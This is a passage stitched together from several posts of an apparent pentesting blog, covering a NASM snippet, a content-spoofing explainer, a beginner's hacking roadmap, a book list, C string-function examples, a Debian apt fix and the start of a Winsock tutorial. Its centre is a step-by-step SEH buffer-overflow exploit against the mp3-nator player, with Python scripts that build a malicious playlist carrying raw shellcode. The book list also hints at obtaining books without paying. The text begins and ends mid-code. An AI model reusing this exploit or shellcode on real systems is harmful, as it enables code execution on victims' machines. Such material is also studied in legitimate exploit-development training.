push 0 ;Reserved=0
call eax ;Call MessageBoxA through GetProcAddress.

push dword [ldlibry] ; ldlibry holding the LoadLibrary("user32.dll"). Again load to Free up.
call _FreeLibrary@4 ;Call the Windows api FreeLibrary()

;We should exit the process otherwise it may cause "access violation"
push 0 ;load 0 to stack
call _ExitProcess@4 ;Call ExitProcess


;Assemble and link:
;nasm -fwin32 ldlibrary.asm
;ld -o ldlibrary.exe ldlibrary.obj -lkernel32 



Content spoofing attack (Brother of Reflected XSS)!

Content spoofing is altering the data/text of web pages. XSS uses <script> or other JavaScript (e.g. <script>alert(1)</script>), whereas content spoofing does not: it can be done with plain text or HTML code. A hacker can deface the page virtually, but is not able to own the server/website.


There are two good explanations of this vulnerability, so you had better read them:

https://www.owasp.org/index.php/Content_Spoofing
http://projects.webappsec.org/w/page/13246917/Content%20Spoofing



Something like this:
https://www.owasp.org/index.php/Pusheax.com_is_a_independent_penetration_tester,_ethical_hacker_who_always_love_to_learn_new_things_and_share_knowledge.Knowledge_should_be_free_but_not_the_hard_work._There_is_nothing_perfect.




http://projects.webappsec.org/w/page/13246917/%28pusheax%20is%20a%20regular%20independent%20pentester%20,%20I%20love%20to%20learn%20new%20things,and??



It is not powerful enough to hack an entire server or website, but sometimes this kind of vulnerability is enough to fool users.
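The two URLs above work because the "page not found" text repeats the requested path as if it were the site's own sentence. The code below is an added example, not from the post or from either of the sites linked: a deliberately spoofable 404 handler next to a hardened one that escapes, truncates, quotes and labels the echoed value so that attacker-chosen words cannot read as site content. Paths and messages are constructed.

```python
# Added example (not from the original post): reflected "not found" text,
# spoofable form beside a hardened form. All inputs are constructed.
import html

def not_found_spoofable(path):
    """Vulnerable: the requested path is dropped into the page verbatim, so whatever
    text the link carries becomes the site's apparent statement, and any HTML renders."""
    return "<p>The page " + path + " does not exist.</p>"

def not_found_hardened(path, max_len=40):
    """Hardened: the site's own sentence contains no user-controlled words; the echoed
    value is HTML-escaped, truncated, quoted and labelled as the requested path."""
    shown = path if len(path) <= max_len else path[:max_len] + "..."
    return ('<p>Page not found.</p>'
            '<p>Requested path: <code>"' + html.escape(shown, quote=True) + '"</code></p>')

def reflected_verbatim(rendered, injected):
    """Detection helper: does the attacker-supplied text appear unchanged in the output?"""
    return injected in rendered

if __name__ == "__main__":
    attack = "This site has moved, call <b>555-0100</b> now"   # constructed
    print(not_found_spoofable(attack))
    print(not_found_hardened(attack))
```

Escaping alone is not the fix for content spoofing, since plain text spoofs just as well as markup; the important part is that the user-controlled value is visibly quoted and labelled, and kept short, rather than woven into the site's own sentence.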

New page of pusheax.com on Facebook !!!

Exploit writing>>> SEH based!

Today I have re-exploited a software called mp3-nator. SEH-based exploitation is a bit challenging. I am going to show you quickly how I exploited this SEH-based vulnerability using only the following tools:

1. Immunity Debugger.
2. mona.py (Corelan).
3. Metasploit(For  shellcode).
4. Vulnerable Application


Access Violation!


First we are going to make the application crash (the classic way!). Before that, attach the application to Immunity Debugger. I hope you already know how to attach an application in Immunity Debugger (File >> Attach >> find Mp3-Nator >> click Attach):


The simple python script:


print "Creating exploit."
f = open("nator.plf", "w")  # Create the file

push = "A" * 6000  # 6000 bytes of junk to trigger the crash

try:
    f.write(push)
    f.close()
    print "File created"
except:
    print "File cannot be created"


After generating "nator.plf" we need to open the file:

1. Click on PlayList menu
2. Load PlayList.
3. Open the nator.plf.

But unfortunately it is not going to overwrite EIP at all, because of SEH.


EDX, EBP, ESI and EDI are holding our own buffer (we can replace it with shellcode!). But SEH also got overwritten by our buffer:




Overwriting SEH means we control SEH and Next SEH, which means we can make the SEH divert execution to our shellcode!



What ? What is SEH? The SEH




Buffer space

I used mona.py to create the pattern (Metasploit can do this too). If you don't know how to install mona or how to use it, go to redmine.corelan.be/projects/mona and read the manual.

The simple mona command is: pattern_create 6000. Replace the "A"s with the pattern saved in the indicated location (for me it is C:\mona\MP3N). Re-generate nator.plf, open it with Mp3-nator in Immunity and we see:

We see SEH and Next SEH got overwritten with mona's pattern. Now we need to find out how much junk buffer we need to reach SEH (same as with EIP). Let's find it:

Now we are sure that we need 4112 bytes to overwrite SEH. To be 100% sure we are going to test it again:


print "Creating exploit."
f = open("nator.plf", "w")  # Create the file

push = "A" * 4108    # 4112-4
push += "B" * 4      # Next SEH
push += "C" * 4      # SEH
push += "D" * 2000   # Shellcode
try:
    f.write(push)
    f.close()
    print "File created"
except:
    print "File cannot be created"

If Next SEH is "BBBB" and SEH is "CCCC" then we are ready to go :).




DO SOMETHING WITH SEH and NSEH
 
This time we want to overwrite SEH and Next SEH with valid addresses so that execution goes to our shellcode. The common approach is to find the address of a "pop pop ret" for SEH and put a few-byte jump in Next SEH.

Run the mona command !mona seh at crash time, open the resulting file and find a null-free address. But unfortunately our life is not that easy: there is no null-free address. The exploit is going to be a bit challenging.

Anyway, I have chosen the address 0x00448f7a from MP3N.exe. Since we have a null byte in our return address, we simply can't put our shellcode after it as we did before.

Do the Calculation

 Calculation for storing shellcode 


LONG JUMP
                        
NSEH


Our calculation is done!!!



BUILDING THE EXPLOIT

Now our exploit layout:
junk+shellcode+nops+jump+nseh+seh+more

In a normal SEH-based overflow we first find an address for "pop pop ret" and put a short jump in NSEH, such as "\xeb\x08\x90\x90", but that is a forward jump, whereas we need a backward jump, as we already calculated using metasm (jmp $-20). Anyway, since our SEH address (0x00448f7a) contains a null byte, we can't simply short-jump to our nops or shellcode. For this reason we need a long jump to land where our nops start.

The simple way to explain this:

Junk of 2608 bytes (put nops instead of "A" to be safe). Then put the 343-byte shellcode, so the stack holds 2608+343. Then 1152 more nops (\x90) and the long jump "\xe9\x2b\xf8\xff\xff". The long jump is an instruction of 5 bytes. We now have exactly the bytes needed to reach SEH and NSEH and overwrite them with our addresses:
2608+343+1152+5=4108.


After the 4108 bytes of junk we need NSEH to make a short jump to our long jump. If we make a 20-byte backward jump, we land in our 1152 nops. Remember, nops do nothing but fall through, so execution simply runs into the long jump "\xe9\x2b\xf8\xff\xff" again. After executing the long jump it goes back into our 2608 nops. After the nops we have the shellcode to execute. Since we made a 2000-byte backward jump, it needs to pass 1113 nops to reach our shellcode.
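The two jump encodings above ("\xeb\xea" and "\xe9\x2b\xf8\xff\xff") and the region arithmetic are easy to get off by a few bytes, which is exactly what the debugger session below is checking by hand. The following is an added example, not code from the post: it encodes both relative jumps from the distances the post states, decodes them back, and walks the layout junk+shellcode+nops+jump+nseh+seh to report which region each jump lands in. Offsets are positions within the generated file (0 = first byte), not stack addresses; the region sizes are the post's own numbers.

```python
# Added example (not from the original post): encode/decode the two relative
# jumps and check where they land in the buffer layout described above.
import struct

def jmp_short(delta):
    """EB rel8: jump `delta` bytes measured from the start of this 2-byte instruction."""
    rel = delta - 2                      # rel8 is relative to the next instruction
    if not -128 <= rel <= 127:
        raise ValueError("out of range for a short jump")
    return b"\xeb" + struct.pack("<b", rel)

def jmp_near(delta):
    """E9 rel32: jump `delta` bytes measured from the start of this 5-byte instruction."""
    return b"\xe9" + struct.pack("<i", delta - 5)

def decode_delta(code):
    """Inverse of the encoders: distance from the instruction start to its target."""
    if code[0] == 0xEB:
        return 2 + struct.unpack("<b", code[1:2])[0]
    if code[0] == 0xE9:
        return 5 + struct.unpack("<i", code[1:5])[0]
    raise ValueError("not a jmp")

# The post's layout, in file order, with the post's sizes.
LAYOUT = [("junk", 2608), ("shellcode", 343), ("nops", 1152),
          ("jump", 5), ("nseh", 4), ("seh", 4)]

def regions(layout=LAYOUT):
    """name -> (start, end) file offsets, end exclusive."""
    out, pos = {}, 0
    for name, size in layout:
        out[name] = (pos, pos + size)
        pos += size
    return out

def region_of(offset, reg):
    for name, (lo, hi) in reg.items():
        if lo <= offset < hi:
            return name
    return None

def trace(layout=LAYOUT, short_delta=-20, long_delta=-2000):
    """Follow the path the post describes: after pop/pop/ret execution starts at nseh,
    the short jump must land in the nop sled, the sled runs into the long jump, and the
    long jump must land in the junk region (which is nops too) ahead of the shellcode."""
    reg = regions(layout)
    nseh_off, long_off = reg["nseh"][0], reg["jump"][0]
    short_to = nseh_off + decode_delta(jmp_short(short_delta))
    long_to = long_off + decode_delta(jmp_near(long_delta))
    return {
        "nseh_offset": nseh_off,
        "seh_offset": reg["seh"][0],
        "short_jump": jmp_short(short_delta),
        "short_lands_at": short_to,
        "short_lands_in": region_of(short_to, reg),
        "long_jump": jmp_near(long_delta),
        "long_lands_at": long_to,
        "long_lands_in": region_of(long_to, reg),
        "shellcode_at": reg["shellcode"][0],
    }

if __name__ == "__main__":
    for k, v in trace().items():
        print(k, v)
```

Changing a region size in `LAYOUT` (a different shellcode length, say) immediately shows whether the 4108-byte offset to NSEH still holds and whether either jump now lands somewhere other than a nop sled, which is the check to run before going back to the debugger.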


Anyway, let's get back to the debugger and do some tests:

print "Creating exploit."
f = open("nator.plf", "w")  # Create the file

junk = "\x90" * 2608  # 2608 bytes of nops in place of the "A"s (see the final script)
#343 bytes shellcode
shellcode = "D" * 343
nops = "\x90" * 1152
jump = "\xe9\x2b\xf8\xff\xff"  # Jump back -2000 bytes
nseh = "\xeb\xea\x90\x90"      # short jump
seh = "\x7a\x8f\x44\x00"       # 0x00448f7a
more = "\x90" * 1000

try:
    f.write(junk + shellcode + nops + jump + nseh + seh + more)
    f.close()
    print "File created"
except:
    print "File cannot be created"



Open the application in the debugger, run it and search for the SEH address 0x00448f7a. Set a breakpoint by pressing F2.






Now open nator.plf in the application. Press SHIFT+F9 at the first crash. We hit our breakpoint. If we scroll down a bit, we see that we have a bunch of "D"s within our 4108 bytes.


After pressing SHIFT+F9 we hit the breakpoint. Now press F8 until we reach the nops:

We just did a 20-byte backward jump into the nops. Let's keep going with F8. "0012FD53 ^E9 2BF8FFFF JMP 0012F583" is actually the long jump, and it goes back 2000 bytes to where our nops start. So if we keep pressing F8 we will soon reach "44", which means "D"; later we will replace the D's with our real shellcode.



So it is time to put in our real shellcode. Here is the final script:


print "Creating exploit."
f = open("nator.plf", "w")  # Create the file
junk = "\x90" * 2608  # 2608 bytes of nops instead of "A"
#343 bytes shellcode
shellcode =("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x36\x42\x50\x5a")
nops = "\x90" * 1152
jump = "\xe9\x2b\xf8\xff\xff"  # Jump back -2000 bytes
nseh = "\xeb\xea\x90\x90"      # short jump
seh = "\x7a\x8f\x44\x00"       # 0x00448f7a
more = "\x90" * 1000

try:
    f.write(junk + shellcode + nops + jump + nseh + seh + more)
    f.close()
    print "File created"
except:
    print "File cannot be created"


Note: I copied the shellcode from a working exploit. But you can always generate shellcode using Metasploit. Do so!


And pop the calc:

BOOM!!!



The most important part of this exploit is dealing with the null byte in the "pop pop ret" address. I hope you now have a clear understanding of how to work in this kind of situation. But if you still have any problem, contact me or comment here and I will try my best to help you!

I have tried to make it simple. If you want to know more about SEH-based exploits, corelan has very good tutorials about SEH:
https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/  and

https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/


Good luck and happy hunting!!!













Getting started in pentesting!!!

Do you also want to get started with pentesting and hacking? Thousands of people want to get started with pentesting and hacking but have no clue where to start. So I quickly wrote this article so that you can get started very easily without any confusion.

NOTE: Hacking is a long road, since it is research. You need to change your mind completely and be 100% serious that you will start studying to be a hacker or a pentester. If you want to hack for temporary fun or to impress your friends, then being a script kiddie is okay (keyloggers and RATs). It is not possible to learn hacking in a few months; it may take 3-10 years to become a good one. So take one option: 1. become a script kiddie, 2. become a professional pentester or hacker, security researcher. Up to you!!!



Basic

1. Basics of networking: an understanding of networking is really important, since everything we do is over the network. So you should have a good understanding of TCP/IP and the OSI model.

2. Programming: programming is very important for being a hacker or pentester, because we must know how a program and a system really work. Also, without programming skills it is hard to find a vulnerability. The most important languages you should learn are:

                Python.
                C/C++
                Assembly
                PHP


Intermediate

1. Become a system administrator: yes, you need to be a system administrator of both Linux and Windows. If you can't be a good system administrator then it is not possible to be a good pentester.

2. Writing code: write basic code. You don't need to be a software developer, but programming is the best weapon to solve your problems. For example, you want to complete a task automatically (such as deleting a file), check the permissions of hundreds of files, etc. So write code!!! Maybe 10-50 lines of code can do very powerful work for you.

3. Read some online articles, resource:





4. Try to go deeper into the operating system: yes, understand the internals of the OS (Windows, Linux). If you want to be a hacker then you need to know the operating system very well.



Intermediate+

1. Virtualization :  Get vmware workstation or virtual box . Install various operating system such windows xp,7, redhat,debian etc. Install some additional software and run your port scanner, vulnerability scanner etc. 

2. Old applications and known vulnerabilities: go to exploit-db.com and get some vulnerable applications. Install them on your VM and re-create the exploit. Use your debugger and your knowledge. You should install various software, including web and system software. You may also get the OWASP "Broken Web Applications" project.

3. Pentesting distro: Install Kali (Backtrack) Linux and use the tools against your VM.

4. Hack: Hack yourself and hack the VM before going to the real world.



Advance

You will understand when you need advanced knowledge, and what "advanced" means, when you get there.






There are lots of things you need to become a successful hacker. Everything can take 1, 2 or 3 years, or even more. You need to be patient and serious about hacking. It is not possible to hack, or to learn to hack, within a few days. Just keep going until success, and success will be waiting for you :). Various books on pentesting are really very helpful. I will write another new post with reviews of some books to learn hacking more quickly.











Useful books to get into hacking!

A good book can take you far. Having some good books is really a good idea for learning something new and improving our knowledge. I have posted some useful books below (Amazon links; no matter how you get them). These books will really help you get into hacking. After reading them you will have a very good understanding of systems and hacking, and you will be able to find the information you are looking for. There are thousands of free papers, but you don't know what to search for and what to learn. After reading these books you will have a goal, though.



1. C Primer Plus, 5th Edition: To get into hacking and penetration testing we need to understand a programming language. The most powerful language is C. This book is very good for learning the C programming language, whereas "The C Programming Language" is a bit harder for newbies. Get this book and start reading.

2. Core Python Application Programming: For automating quick tasks we need to code in a scripting language (for example for exploit development). For this, Python is really very powerful (my favorite language). Learn Python from this book. For the basics of Python get the book "Learn Python the Hard Way" or go to the tutorial section of www.python.org.


3. Assembly Language Step-by-Step: Assembly language is very important for understanding how systems work and for exploit development. This book will teach you basic assembly language using NASM, which is enough to understand registers, instructions and basic coding (such as shellcoding). After reading this book you should read the Intel manuals.

4. Advanced Linux Programming: Don't avoid Linux internals. We are required to know Linux internals, and system programming is the best way to learn them. This book is good and freely downloadable.

5. Get two books on Windows: Windows® Internals, Part 1: Covering Windows Server® 2008 R2 and Windows 7, and Windows® Internals, Part 2: Covering Windows Server® 2008 R2 and Windows 7. Read them when you have free time. Knowing Windows internals is very useful.


6. Basics of Penetration Testing, 2nd edition: I have read the first edition and it was good for newbies coming into hacking. Get the basic idea of penetration testing and hacking from this book.

7. The Web Application Hacker's Handbook, 2nd edition: This is a gold book for learning web hacking. If you are a newbie and read this book carefully then you will have a very good understanding of web hacking. I believe you don't need any other book to learn web hacking. After reading this book you just need to start your real research on web hacking. Another book is the OWASP "Web Application Penetration Testing Guide", which is a good start too.

8. The Shellcoder's Handbook, second edition: This book is very good for learning system hacking. It is a bit outdated but still very useful. It discusses common software vulnerabilities like buffer overflows, format strings, shellcoding etc. Get this book!!!

9. Hacking using Python: I did not read this book fully, but the book is very good if you want to know how to hack using the Python programming language. Yes, you should read this book (get it somehow!).
 
10. Corelan: Corelan has more than 11 tutorials, which are worth more than other commercial exploit development courses and books. Read them if you want to move into exploit development and shellcoding.

11. Metasploit cookbook




Easy examples of strstr(), strspn(), strrchr(), strchr(), strpbrk(), memcpy(), memset(), memcmp() - #include <string.h>

I have written quick examples of a few functions such as strspn(), strrchr(), strchr(), strpbrk(), memcpy() etc. from the C library. We often use these functions for dealing with strings. The code is very easy to read and write. I am just pasting the code here; please read the comments, and if you have any questions, please post a comment!


strstr():


/*
* use and example of strstr() function
*/

/*
* The strstr() function finds the first occurrence of the substring needle in the string haystack.
* The terminating null bytes ('\0') are
* not compared.
*/


#include<stdio.h>
#include<string.h>
int main(){
    const char *str="what the hell! system got hacked!!!"; /* the haystack */
    const char *str2="what";   /* needle found at the very start of str */
    const char *str3="system"; /* needle found in the middle of str */
    /* strstr() returns a pointer into str, so printing it shows the rest of str from the match on.
     * It returns NULL when the needle is absent, which must be checked before printing. */
    printf("\n%s\n\n",strstr(str,str3));
    printf("%s\n\n",strstr(str,str2));
    return 0;
}

/* gcc strstr1.c -o strstr1
* ./strstr1
* system got hacked!!!
*
* what the hell! system got hacked!!!
*
*/





strspn():



/* The use and example of strspn() */
/* search a string for a set of bytes. The strspn()
* function calculates the length (in bytes) of the initial segment of s which consists entirely of bytes in accept. */


#include<stdio.h>
#include<string.h>

int main(){
    const char *str="C is a greate system language 1337";
    const char *str2="1234567890";
    /* strspn() returns a size_t, so it must be printed with %zu (not %s, which would
     * treat the number as a pointer). str starts with 'C', which is not in str2,
     * so the initial digit run has length 0; for "1337 leet" it would be 4. */
    printf("Lets see %zu\n",strspn(str,str2));
    return 0;

}




strrchr():


/*use and example of strrchr()*/
/*
* The strrchr() function returns a pointer to the last occurrence of the character c in the string s.
* This searches for the char from the end. For example if we search 'a' then it will point you to "ammer"
* in "programmer".

*/


#include<stdio.h>
#include<string.h>

int main(){
    const char *str="You are the programmer";
    char str1;         /* %c stores one byte, so this must be a char, not an int */
    const char *found;
    printf("Enter a char:");
    if(scanf("%c",&str1)!=1)
        return 1;
    found=strrchr(str,str1); /* NULL when the char does not occur in str */
    if(found==NULL)
        /* printing a NULL with %s is undefined; glibc happens to print "(null)",
         * which is what the sample run below shows for 'y' */
        printf("\'%c\' not found in \'%s\'\n",str1,str);
    else
        printf("\'%c\' found in \'%s\'\n",str1,found);
    return 0;
}

/*
* pusheax@programming:~/codes/linux1blog$ gcc strrchar.c -o strrchar
* pusheax@programming:~/codes/linux1blog$ ./strrchar
* Enter a char:a
'a' found in 'ammer'
pusheax@programming:~/codes/linux1blog$ ./strrchar
Enter a char:u
'u' found in 'u are the programmer'
pusheax@programming:~/codes/linux1blog$ ./strrchar
Enter a char:o
'o' found in 'ogrammer'
pusheax@programming:~/codes/linux1blog$ ./strrchar
Enter a char:y
'y' found in '(null)'
pusheax@programming:~/codes/linux1blog$ ./strrchar
Enter a char:Y
'Y' found in 'You are the programmer'
pusheax@programming:~/codes/linux1blog$
*/



strchr():




/* The use and example of strchr() */

#include<stdio.h>
#include<string.h>/*include string.h for all the string related function*/

int main(){
    const char *strng="Mr. Stupid!"; //We will search the char in this string
    char secstr='S'; //Char should be enclosed in single quotes
    int search=(strchr(strng,secstr) != NULL); //strchr() returns NULL when the char is absent, so search is 1 or 0

    if (!search) //The char was not found
        printf("The char is not found!\n");
    else //Otherwise it was
        printf("Wow the char \'%c\' found in strng \"%s\"\n",secstr,strng);

    return 0;
}


strpbrk():




/* use and example of strpbrk() */
/* strpbrk - search a string for any of a set of bytes */

#include<stdio.h>
#include<string.h>

int main(){
    const char *str="Programming is another best way to learn hacking";
    const char *str2="b";
    const char *search=strpbrk(str,str2); //Is any char of str2 in str? strpbrk returns a pointer to the first match, or NULL
    if (search==NULL) //Never dereference the result before this check
        printf("Nothing!\n");
    else
        printf("Found \'%c\' in \"%s\"\n",*search,str); //Yes it is, so print which char it is
    return 0;
}




memcpy():



/*Use and example memcpy() and memmove()*/

/*memcpy - copy memory area*/

//memcpy() does not check the boundary. Be careful!

#include<stdio.h>
#include<string.h>


int main(){
    char str1[]="Hello all hackers!";
    char str[sizeof(str1)]; /* the destination must hold every byte copied; a 10-byte buffer here would overflow the stack */
    memcpy(str,str1,sizeof(str1)); /* sizeof(str1) includes the terminating '\0' */
    printf("%s\n",str);
    return 0;
}



memset():



//Use and example of memset()
//memset - fill memory with a constant byte

#include<stdio.h>
#include<string.h>

int main(){
    char str[]="Life is boring!";
    int str1='A';   /* the fill byte; memset takes an int but stores it as an unsigned char */
    size_t n=4;     /* how many bytes to overwrite; keep it below sizeof(str) so the '\0' survives */
    printf("First string:%s\n",str);
    printf("Now it is:%s\n",(char*)memset(str,str1,n)); /* "AAAA is boring!" */
    return 0;
}

memcmp():


#include<stdio.h>
#include<string.h>

int main(){
    char str[]="ABa";
    char str1[]="AbA";
    int what=memcmp(str,str1,sizeof(str)); /* compares all 4 bytes, including the '\0' */
    if(what)
        printf("Return:%d not matched\n",what); /* non-zero: the second byte differs ('B' != 'b') */
    else
        printf("Return:%d mean equal\n",what);

    printf("Lets print something different!\n");
    /* memcmp() compares bytes as unsigned char and stops at the first difference:
     * over 2 bytes "AB" and "Ab" differ, and the result is negative because 'B' (66) < 'b' (98);
     * over 1 byte only "A" and "A" are compared, so the result is 0 */
    printf("Confused for:%d ?\n",memcmp(str,str1,2));
    printf("Another confusion for :%d ?\n",memcmp(str,str1,1));
    return 0;
}
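The examples above each use one function in isolation. As an added example (my code, not from the original post), here is the same family of functions working together to parse an HTTP request line, with every return value checked: strchr() finds the separators, memcmp() compares the method on an exact length, strspn() enforces a character allow-list on the path, strstr() rejects "..", strrchr() picks out the file extension, and a small bounded_copy() wrapper makes sure memcpy() never writes past the destination. The struct, the helper names and the sample request lines are my own.

```c
#include <stdio.h>
#include <string.h>

/* Bounded copy: memcpy() never checks sizes, so the caller must.
 * Returns 1 on success, 0 if src (plus the terminating NUL) does not fit. */
int bounded_copy(char *dst, size_t dstlen, const char *src, size_t srclen)
{
    if (dstlen == 0 || srclen >= dstlen)
        return 0;
    memcpy(dst, src, srclen);
    dst[srclen] = '\0';
    return 1;
}

struct request {
    char method[8];
    char path[64];
    char ext[8];   /* extension of the last path component, "" if none */
};

/* Parses "METHOD SP PATH SP HTTP/1.x" (optionally followed by CRLF) into *out.
 * Returns 1 when every check passes, 0 otherwise (hypothetical helper). */
int parse_request_line(const char *line, struct request *out)
{
    static const char path_chars[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789/._-";
    const char *sp1, *sp2, *ver, *end, *dot, *slash;
    size_t mlen, plen, vlen;

    memset(out, 0, sizeof(*out));          /* start from a known state */

    /* strchr(): locate the two separating spaces, failing if either is missing */
    sp1 = strchr(line, ' ');
    if (sp1 == NULL) return 0;
    sp2 = strchr(sp1 + 1, ' ');
    if (sp2 == NULL) return 0;

    /* memcmp() on an exact length: only GET and HEAD are accepted */
    mlen = (size_t)(sp1 - line);
    if (!((mlen == 3 && memcmp(line, "GET", 3) == 0) ||
          (mlen == 4 && memcmp(line, "HEAD", 4) == 0)))
        return 0;

    /* strspn(): the path must be non-empty, start with '/' and consist
     * only of allowed bytes all the way up to the second space */
    plen = (size_t)(sp2 - (sp1 + 1));
    if (plen == 0 || sp1[1] != '/') return 0;
    if (strspn(sp1 + 1, path_chars) < plen) return 0;

    /* strstr()/strpbrk(): version must be HTTP/1.0 or HTTP/1.1 and end the line */
    ver = sp2 + 1;
    if (strstr(ver, "HTTP/") != ver) return 0;
    end = strpbrk(ver, "\r\n");
    vlen = end ? (size_t)(end - ver) : strlen(ver);
    if (vlen != 8 || memcmp(ver, "HTTP/1.", 7) != 0 ||
        (ver[7] != '0' && ver[7] != '1'))
        return 0;

    /* bounded copies: an over-long path is an error, not an overflow */
    if (!bounded_copy(out->method, sizeof(out->method), line, mlen)) return 0;
    if (!bounded_copy(out->path, sizeof(out->path), sp1 + 1, plen)) return 0;

    /* strstr(): refuse ".." so the path cannot climb out of the document root */
    if (strstr(out->path, "..") != NULL) return 0;

    /* strrchr(): extension = text after the last '.' of the last component */
    dot = strrchr(out->path, '.');
    slash = strrchr(out->path, '/');
    if (dot != NULL && dot > slash)
        if (!bounded_copy(out->ext, sizeof(out->ext), dot + 1, strlen(dot + 1)))
            return 0;
    return 1;
}

int main(void)
{
    struct request r;
    /* constructed sample input */
    if (parse_request_line("GET /index.html HTTP/1.1\r\n", &r))
        printf("method=%s path=%s ext=%s\n", r.method, r.path, r.ext);
    if (!parse_request_line("GET /../etc/passwd HTTP/1.1\r\n", &r))
        printf("traversal attempt rejected\n");
    return 0;
}
```

The point of the allow-list plus the length checks is that a request line can only end up in the fixed-size fields if it is well formed; anything else is refused before memcpy() runs.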

debian apt-get or aptitude update Hash Sum mismatch

We need "apt-get update" to refresh the Debian package lists if we want to upgrade Debian to the next release. When I was going to upgrade Debian, I got the error "Hash Sum mismatch", something like:

W: Failed to fetch bzip2:/var/lib/apt/lists/partial/mirrors.yourmirror.com_debian_dists_wheezy_main_i18n_Translation-en  Hash Sum mismatch

E: Some index files failed to download. They have been ignored, or old ones used instead.


It happened several times in the past. Today, when I was going to upgrade Debian 7 to 7.1.0, I got this error again.

Anyway, it was caused by the package mirror. So I decided to change the server address in sources.list. To select a fast server I used "netselect-apt":

apt-get install netselect-apt && cd /etc/apt/ && netselect-apt -n wheezy -o sources.list

This command installs netselect-apt, finds the fastest server and then replaces the old sources.list. It will output something like:


Duplicate address 64.50.233.100 (http://64.50.233.100/debian/, http://ftp-nyc.osuosl.org/debian/); keeping only under first name.
netselect: 43 (23 active) nameserver request(s)...
Duplicate address 128.30.2.36 (http://128.30.2.36/debian/, http://debian.lcs.mit.edu/debian/); keeping only under first name.
netselect: unknown host debian.comu.edu.tr
netselect: 17 (17 active) nameserver request(s)...
Duplicate address 128.61.240.89 (http://128.61.240.89/debian/, http://debian.gtisc.gatech.edu/debian/); keeping only under first name.
Running netselect to choose 10 out of 398 addresses.
...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
The fastest 10 servers seem to be:

http://mirror.positive-internet.com/debian/
http://mirror.0x.sg/debian/

http://mirror.sov.uk.goscomb.net/debian/
http://mirror.vorboss.net/debian/
http://archive.mmu.edu.my/debian/
http://debian.mirrors.ovh.net/debian/
http://ukdebian.mirror.anlx.net/debian/
http://ukdebian.mirror.anlx.net/debian/
http://opensource.nchc.org.tw/debian/

Of the hosts tested we choose the fastest valid for HTTP:
http://mirror.0x.sg/debian/

Writing netselect-apt.list.
Done.


If netselect-apt keeps selecting the same server for you, you can exclude your local server and replace it with a working fast server.


Hope this post will help someone!








Windows socket programming in C++: your first socket (networking) program!

Windows socket programming in C/C++ was frustrating for me the first time. But winsock2 is not that hard; you can write a basic networking program in a few minutes. Today I will explain the basics of Windows socket programming step by step using winsock2 and C++. If you don't understand C or C++ then you will not understand this article, so you should not start with Windows socket programming before having basic knowledge of C/C++. I am a fan of the gcc compiler, so I used gcc (mingw-w64) to compile all the code on this blog.


To write any Windows program we are required to include "windows.h". For sockets we need only "winsock2.h", which pulls in windows.h itself. So the only two headers we need are:

<iostream>
<winsock2.h>

Well, let's go step by step with an example:
#include <iostream>
#include <winsock2.h>


int main()
{
    WSAData version;                 //Receives details of the winsock implementation.
    WORD mkword=MAKEWORD(2,2);       //We ask for winsock version 2.2.
    int what=WSAStartup(mkword,&version);
    if(what!=0){
        std::cout<<"This version is not supported! - \n"<<WSAGetLastError()<<std::endl;
    }
    else{
        std::cout<<"Good - Everything fine!\n"<<std::endl;
    }

    return 0;
}


In line 7, WSAData is the name of a structure that holds information about the Windows socket implementation. So here we declare our own object to work with, called "version". You will find more details about WSAData here.

In line 8, MAKEWORD() is a macro that produces a WORD. MAKEWORD(2,2) means version "2.2".

In line 9, we store the return value of WSAStartup() in the variable "what". This function checks whether the requested version is supported. If it is, the function returns 0; otherwise it returns an error code, which should be checked with WSAGetLastError() as I did in line 11.

Compile the code and run it; if you are on XP or newer you will get the output "Good - Everything fine!".




Since everything is fine, we now want to create our real socket using the type named "SOCKET":


#include <iostream>
#include <winsock2.h>


int main()
{
    WSAData version;                 //Receives details of the winsock implementation.
    WORD mkword=MAKEWORD(2,2);       //We ask for winsock version 2.2.
